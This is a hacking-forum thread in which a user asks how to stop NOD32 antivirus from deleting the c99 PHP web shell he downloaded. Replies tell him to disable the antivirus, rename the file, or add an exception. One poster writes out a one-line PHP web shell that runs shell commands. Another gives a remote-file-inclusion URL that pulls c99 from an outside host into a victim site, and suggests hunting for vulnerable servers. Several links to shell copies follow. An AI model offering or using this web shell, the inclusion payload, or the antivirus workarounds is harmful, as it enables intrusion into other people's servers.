c99 help

i was trying to download c99.txt but my antivirus was deleting it. The antivirus i m using is nod32. I tried disabling it but when i again enabled it after downloading the shell, it deleted the shell. Please tell me what should i do to download it.

Rename it after downloading it? If that doesn't work try making it some other file type (like JPEG) or something If that doesn't work, leave your antivirus off 'till you've finished with it and save it on a memory stick or something.

I renamed it, tried other extensions but none of these help, i also thought of keeping it out of my pc but i want to store it on my pc so is there any way i can do it.

Lol? NOD actively scans in the file to search for "patterns". Switch NOD off, or better yet, move to a different (perhaps virtual) environment to test out c99.

That said, c99 is freaking bloated, and pretty much useless if you know how it all works.

Just read the source, then install a fucking unix-like distro.

@spyware: as u said c99 is pretty much useless, is there any other alternative solution of using a web shell?

harry_potter28 wrote: @spyware: as u said c99 is pretty much useless, is there any other alternative solution of using a web shell?

<? system($_GET['q']); ?>

all I can say to this entire conversation is >.<

Do you know what the c99 script does? Do you know why NOD32 keeps deleting it?

Please let me know that you at least have an inkling of knowledge in what this system is for………..

http://www.justfuckinggoogleit.com/search.pl?query=c99

yours31f wrote: http://www.justfuckinggoogleit.com/search.pl?query=c99

Hey, you there.

Stop being useless. Thanks.

If you want to store it on your computer, add it to your AV's exceptions.

I have a pretty nice shell that I got from a buddy, PM me if you want the link.

Skunkfoot wrote: I have a pretty nice shell that I got from a buddy, PM me if you want the link.

If it's a public shell, just post the name. If it's a private shell, stop handing out private things.

If it's neither and you were just going to SE this guy by giving him something you can exploit, by all means, go ahead kind sir. Sorry to have stalled you.

I'm not trying to SE him xD.

And if it's a private shell, it's mine and I'm allowed to do with it what i want, right? I don't remember the name because I renamed it. :P

Skunkfoot wrote: I'm not trying to SE him xD.

And if it's a private shell, it's mine and I'm allowed to do with it what i want, right? I don't remember the name because I renamed it. :P

If it's a mod/edit just name the original.

That's what I was saying, I don't remember the name of the original. Either way, there are plenty of different shells out there, I'm sure the OP could find one that he likes with some simple googling.

I read what c99 shell does and nod32 deletes it because of thinking it is a trojan as per the error. @skunkfoot: i had send the pm. btw i forgot to mention that i need the shell to test on my local website.

harry_potter28 wrote: I read what c99 shell does and nod32 deletes it because of thinking it is a trojan as per the error. @skunkfoot: i had send the pm. btw i forgot to mention that i need the shell to test on my local website.

Well then do what said in another post. Add it to NOD32's exception list. Make a folder under htdocs and add that to the list, then put c99 in there.

If you're going to ask for help, at least try what people tell you, or don't bother asking.

@master gamer: already done sir.

The Dude wrote: Dude MasterGamer!

Long time no see, What are you doing here?

Uh, hi?

mastergamer wrote: Uh, hi?

It's fritz to the o, yo.

@OP: Why not just include it from a remote location? There's really no point using a local file for learning how RFI works :p

A remote file inclusion might look like this:

http://www.victimsite.org/index.php?site=http://w7ed.by.ru/c99.txt?

You may want to use goolag to look for vulnerable servers or step up on your google-fu.

http://www.goolag.org/download.html

@UberOn: i know i can do that remotely but i want to learn how the code works thats why i want to download it.

Here you go Harry:

http://74.125.95.132/search?q=cache:KyOqnLv7IWwJ:w7ed.by.ru/c99.txt+c99.txt%3F&hl=en&ct=clnk&cd=1&gl=us

I'll let go of your hand now. ;)

harry_potter28 wrote: @UberOn: i know i can do that remotely but i want to learn how the code works thats why i want to download it. http://m4nn3r.by.ru/c99.txt

Hey guys havent you gone through the thread, i had got the shell, my problem was downloading it because my antivirus was blocking it. Sorry but stop posting the shell url i know it already.:)

harry_potter28 wrote: Hey guys havent you gone through the thread, i had got the shell, my problem was downloading it because my antivirus was blocking it. Sorry but stop posting the shell url i know it already.:) Then why don't you just throw in an exception in your AV settings?

Uber0n wrote: [quote]harry_potter28 wrote: Hey guys havent you gone through the thread, i had got the shell, my problem was downloading it because my antivirus was blocking it. Sorry but stop posting the shell url i know it already.:) Then why don't you just throw in an exception in your AV settings?[/quote]

I believe I have already advised him to do so. :P

c4p_sl0ck wrote: If you want to store it on your computer, add it to your AV's exceptions.

c4p_sl0ck wrote: I believe I have already advised him to do so. :P Yup. Some things are worth saying twice, specially since OP missed it the first time :p

Uber0n wrote: Yup. Some things are worth saying twice, specially since OP missed it the first time :p

Perhaps. Indeed, some things never go in no matter how many times you hear them. I hope that it isn't the case here. :P

Uber0n wrote: [quote]c4p_sl0ck wrote: I believe I have already advised him to do so. :P Yup. Some things are worth saying twice, specially since OP missed it the first time :p[/quote]

I had already done it and I had mentioned it in the thread previously on the first page.

harry_potter28 wrote: I had already done it and I had mentioned it in the thread previously on the first page. If your AV still removes it you obviously haven't made an exception for it.